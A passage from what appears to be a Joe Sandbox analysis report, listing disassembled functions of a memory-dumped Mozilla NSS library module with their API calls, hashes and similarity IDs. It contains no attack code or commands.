                                                              • Instruction Fuzzy Hash: 896193B9E042068BEB11CF69D880BAEB7B5FF58348F095024ED15A7305E7B5ED50CBA1
                                                              Function 6D0F2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32(6D0F3F23,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2C62
                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2C76
                                                              • PL_HashTableLookup.NSS3(00000000,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2C86
                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2C93
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2CC6
                                                              • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2CDA
                                                              • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23), ref: 6D0F2CEA
                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?), ref: 6D0F2CF7
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?), ref: 6D0F2D4D
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0F2D61
                                                              • PL_HashTableLookup.NSS3(?,?), ref: 6D0F2D71
                                                              • PR_Unlock.NSS3(?), ref: 6D0F2D7E
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07AD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07CD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07D6
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D05204A), ref: 6D0C07E4
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,6D05204A), ref: 6D0C0864
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D0C0880
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,6D05204A), ref: 6D0C08CB
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08D7
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08FB
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                              • String ID:
                                                              • API String ID: 2446853827-0
                                                              • Opcode ID: 8d92e602d1013175d16daedc124534e8ebdcc5aa9b43aef57c76ac67f28f3c37
                                                              • Instruction ID: fb464eead81b18bad0b8c5d148dbbba189c7f53742282b045fd69fa203db1adf
                                                              • Opcode Fuzzy Hash: 8d92e602d1013175d16daedc124534e8ebdcc5aa9b43aef57c76ac67f28f3c37
                                                              • Instruction Fuzzy Hash: F151F4B6C00605ABFB119F34EC45A6AB7B8BF05358B168524ED18D7212E731ED61CBE2
                                                              Function 6D0E7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_CallOnce.NSS3(6D232120,6D0E7E60,?,?,?,?,?,6D1651DF,6D165990,00000000), ref: 6D0E7C81
                                                                • Part of subcall function 6D054C70: TlsGetValue.KERNEL32(?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054C97
                                                                • Part of subcall function 6D054C70: EnterCriticalSection.KERNEL32(?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CB0
                                                                • Part of subcall function 6D054C70: PR_Unlock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CC9
                                                              • TlsGetValue.KERNEL32 ref: 6D0E7CA0
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0E7CB4
                                                              • PR_Unlock.NSS3 ref: 6D0E7CCF
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • TlsGetValue.KERNEL32 ref: 6D0E7D04
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0E7D1B
                                                              • realloc.MOZGLUE(-00000050), ref: 6D0E7D82
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0E7DF4
                                                              • PR_Unlock.NSS3 ref: 6D0E7E0E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                              • String ID:
                                                              • API String ID: 2305085145-0
                                                              • Opcode ID: 42f2f86b09346a8faedd005c03cd7eefe084a3aa21534650b83ef230339823d0
                                                              • Instruction ID: 3fdf4e656ef28f65dc7b4becfef9cd0362a1f8999d7755ebbaec88df715e0e4b
                                                              • Opcode Fuzzy Hash: 42f2f86b09346a8faedd005c03cd7eefe084a3aa21534650b83ef230339823d0
                                                              • Instruction Fuzzy Hash: 0A51BEB5D08101AFEF215F28DD44B3A77B5FFC6398F168029EA4587263EB30D464CA81
                                                              Function 6D054C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054C97
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CB0
                                                              • PR_Unlock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CC9
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D11
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D2A
                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D4A
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D57
                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D97
                                                              • PR_Lock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054DBA
                                                              • PR_WaitCondVar.NSS3 ref: 6D054DD4
                                                              • PR_Unlock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054DE6
                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054DEF
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                              • String ID:
                                                              • API String ID: 3388019835-0
                                                              • Opcode ID: 869328e194fba13bdbb8ef374f05d162f6f43ad033f0335ebd4aec113cf5f02c
                                                              • Instruction ID: 7618ddbdbbaf229226e9a394c1f09da72f26acb091e3d3980eab4be5ea58e232
                                                              • Opcode Fuzzy Hash: 869328e194fba13bdbb8ef374f05d162f6f43ad033f0335ebd4aec113cf5f02c
                                                              • Instruction Fuzzy Hash: 0541ACB4908605DFDB11AFB9D58876ABBF0BF49318F068629DC489B310E730D8A0CF91
                                                              Function 6D1E7CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E7CE0
                                                                • Part of subcall function 6D199BF0: TlsGetValue.KERNEL32(?,?,?,6D1E0A75), ref: 6D199C07
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D1E7D36
                                                              • PR_Realloc.NSS3(?,00000080), ref: 6D1E7D6D
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E7D8B
                                                              • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6D1E7DC2
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D1E7DD8
                                                              • malloc.MOZGLUE(00000080), ref: 6D1E7DF8
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E7E06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                              • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                              • API String ID: 530461531-3274975309
                                                              • Opcode ID: f5d705172bc73581374ab4034f2591ffa9b606d00c39cd27bab74eef6925d550
                                                              • Instruction ID: 9cb2ebe2756db56198cd00810cb928c66695e8ea278355109c6c18d9ce7ec3c2
                                                              • Opcode Fuzzy Hash: f5d705172bc73581374ab4034f2591ffa9b606d00c39cd27bab74eef6925d550
                                                              • Instruction Fuzzy Hash: 6241E5B1D046029FEB08CF28DC8097B37BAFF84354B158569F9198B256D7B1E840C7A1
                                                              Function 6D102CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_InitToken), ref: 6D102CEC
                                                              • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6D102D07
                                                                • Part of subcall function 6D1E09D0: PR_Now.NSS3 ref: 6D1E0A22
                                                                • Part of subcall function 6D1E09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D1E0A35
                                                                • Part of subcall function 6D1E09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D1E0A66
                                                                • Part of subcall function 6D1E09D0: PR_GetCurrentThread.NSS3 ref: 6D1E0A70
                                                                • Part of subcall function 6D1E09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D1E0A9D
                                                                • Part of subcall function 6D1E09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D1E0AC8
                                                                • Part of subcall function 6D1E09D0: PR_vsmprintf.NSS3(?,?), ref: 6D1E0AE8
                                                                • Part of subcall function 6D1E09D0: EnterCriticalSection.KERNEL32(?), ref: 6D1E0B19
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D1E0B48
                                                                • Part of subcall function 6D1E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D1E0C76
                                                                • Part of subcall function 6D1E09D0: PR_LogFlush.NSS3 ref: 6D1E0C7E
                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6D102D22
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(?), ref: 6D1E0B88
                                                                • Part of subcall function 6D1E09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D1E0C5D
                                                                • Part of subcall function 6D1E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D1E0C8D
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0C9C
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(?), ref: 6D1E0CD1
                                                                • Part of subcall function 6D1E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D1E0CEC
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0CFB
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D1E0D16
                                                                • Part of subcall function 6D1E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D1E0D26
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0D35
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6D1E0D65
                                                                • Part of subcall function 6D1E09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D1E0D70
                                                                • Part of subcall function 6D1E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D1E0D90
                                                                • Part of subcall function 6D1E09D0: free.MOZGLUE(00000000), ref: 6D1E0D99
                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6D102D3B
                                                                • Part of subcall function 6D1E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D1E0BAB
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0BBA
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0D7E
                                                              • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6D102D54
                                                                • Part of subcall function 6D1E09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D1E0BCB
                                                                • Part of subcall function 6D1E09D0: EnterCriticalSection.KERNEL32(?), ref: 6D1E0BDE
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(?), ref: 6D1E0C16
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                              • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                              • API String ID: 420000887-1567254798
                                                              • Opcode ID: 2a475dd95901db7fd39d8baa5769bef2f01c000ad9b60314ae8638cb4bcbfb90
                                                              • Instruction ID: 58067b18bf7aab9dfb747beb3c45481ef08e8a5e008d2d2edbe0dea9bfada4a2
                                                              • Opcode Fuzzy Hash: 2a475dd95901db7fd39d8baa5769bef2f01c000ad9b60314ae8638cb4bcbfb90
                                                              • Instruction Fuzzy Hash: D3218CB9105104AFDB30AF55DE8CB5A3BB5EB8631DF068015F60897126DFB18C45DBE1
                                                              Function 6D144DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6D144DCB
                                                                • Part of subcall function 6D130FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D0D87ED,00000800,6D0CEF74,00000000), ref: 6D131000
                                                                • Part of subcall function 6D130FF0: PR_NewLock.NSS3(?,00000800,6D0CEF74,00000000), ref: 6D131016
                                                                • Part of subcall function 6D130FF0: PL_InitArenaPool.NSS3(00000000,security,6D0D87ED,00000008,?,00000800,6D0CEF74,00000000), ref: 6D13102B
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6D144DE1
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6D144DFF
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D144E59
                                                                • Part of subcall function 6D12FAB0: free.MOZGLUE(?,-00000001,?,?,6D0CF673,00000000,00000000), ref: 6D12FAC7
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D20300C,00000000), ref: 6D144EB8
                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6D144EFF
                                                              • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6D144F56
                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D14521A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                              • String ID:
                                                              • API String ID: 1025791883-0
                                                              • Opcode ID: d3847decd6429c7e309ff2214cd3759dc477d3201eab8b45223001bc304b5551
                                                              • Instruction ID: 5957a687f447248deec83b05692e3a5483da1917b2af2f5532084cde0d3e3733
                                                              • Opcode Fuzzy Hash: d3847decd6429c7e309ff2214cd3759dc477d3201eab8b45223001bc304b5551
                                                              • Instruction Fuzzy Hash: 69F19F75E0420ACFEB04CF98D4407BEB7B2BF58354F258169D914AB289E7B5E981CB90
                                                              Function 6D140C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(6D142C2A), ref: 6D140C81
                                                                • Part of subcall function 6D12BE30: SECOID_FindOID_Util.NSS3(6D0E311B,00000000,?,6D0E311B,?), ref: 6D12BE44
                                                                • Part of subcall function 6D118500: SECOID_GetAlgorithmTag_Util.NSS3(6D1195DC,00000000,00000000,00000000,?,6D1195DC,00000000,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D118517
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D140CC4
                                                                • Part of subcall function 6D12FAB0: free.MOZGLUE(?,-00000001,?,?,6D0CF673,00000000,00000000), ref: 6D12FAC7
                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D140CD5
                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6D140D1D
                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6D140D3B
                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6D140D7D
                                                              • free.MOZGLUE(00000000), ref: 6D140DB5
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D140DC1
                                                              • free.MOZGLUE(00000000), ref: 6D140DF7
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D140E05
                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D140E0F
                                                                • Part of subcall function 6D1195C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D1195E0
                                                                • Part of subcall function 6D1195C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D1195F5
                                                                • Part of subcall function 6D1195C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6D119609
                                                                • Part of subcall function 6D1195C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D11961D
                                                                • Part of subcall function 6D1195C0: PK11_GetInternalSlot.NSS3 ref: 6D11970B
                                                                • Part of subcall function 6D1195C0: PK11_FreeSymKey.NSS3(00000000), ref: 6D119756
                                                                • Part of subcall function 6D1195C0: PK11_GetIVLength.NSS3(?), ref: 6D119767
                                                                • Part of subcall function 6D1195C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6D11977E
                                                                • Part of subcall function 6D1195C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D11978E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                              • String ID:
                                                              • API String ID: 3136566230-0
                                                              • Opcode ID: e23233274cb5a1203113ce8d882a2468c60c1bc15de903c591e5d531e92149a8
                                                              • Instruction ID: 7a7f546b57772de06db398a9e8fd1a5bb6a64be8845f288528cc0ee7b773b2f0
                                                              • Opcode Fuzzy Hash: e23233274cb5a1203113ce8d882a2468c60c1bc15de903c591e5d531e92149a8
                                                              • Instruction Fuzzy Hash: DD41A3B1D04206ABEB009F66DC45BBF7674BF64318F018024FE156B245EBB5EA54CBE2
                                                              Function 6D0EFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6D0EFCBD
                                                              • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6D0EFCCC
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6D0EFCEF
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0EFD32
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6D0EFD46
                                                              • PORT_Alloc_Util.NSS3(00000001), ref: 6D0EFD51
                                                              • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6D0EFD6D
                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D0EFD84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                              • String ID: :
